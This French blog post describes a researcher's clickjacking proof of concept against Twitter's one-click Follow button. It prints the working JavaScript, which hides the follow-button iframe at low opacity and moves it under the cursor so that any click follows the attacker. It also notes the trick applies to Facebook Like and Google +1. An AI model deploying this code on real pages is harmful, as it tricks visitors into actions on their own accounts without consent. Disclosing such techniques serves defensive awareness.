Peu de temps après la mise à disposition par Twitter d’un bouton « Follow » qui permet en 1 click de suivre quelqu’un sur Twitter, Pierre, un chercheur en sécurité a mis au point un proof of concept de click jacking assez fourbe. L’idée est qu’en masquant une iframe contenant un bouton de follow twitter, avec un petit coup de CSS et en en capturant avec du javascript les déplacements de la souris afin de positionner cette iframe sous le curseur de la victime, peu importe l’endroit où celle-ci clique dans la page, hop ça fera des followers de plus à l’attaquant.
Diabolique !
if (!document.getElementsByClassName){
document.getElementsByClassName = function(classname){
for (i=0; i < document.getElementsByTagName("*").length; i++)
{
if (document.getElementsByTagName("*").item(i).className == classname){
return new Array(document.getElementsByTagName("*").item(i));
}
}
}
}
var twitterFollowIframe = document.getElementsByClassName('twitter-follow-button')[0];
twitterFollowIframe.style.position = 'absolute';
twitterFollowIframe.style.opacity = '0.2';
twitterFollowIframe.style.filter = 'alpha(opacity=20)';
document.onmousemove = function(e){
if ( !e ) e = window.event;
twitterFollowIframe.style.left = e.clientX - 20;
twitterFollowIframe.style.top = e.clientY - 10;
}Si vous voulez voir une démo live du PoC, cliquez ici. Il a mis la transparence à 40% pour que vous puissiez voir le bouton twitter sous votre souris, mais sachez qu’en la mettant à 100%, ce sera totalement invisible.
Oups 😉
Evidemment, comme vous me l’avez fait remarqué dans les commentaires, cette technique de click jacking peut aussi s’appliquer à d’autres choses comme le Like de Facebook ou le +1 de Google. Les système d’abonnement ou de vote 1 click seront toujours à la merci de ce genre de choses.
Merci à John Jean pour l’info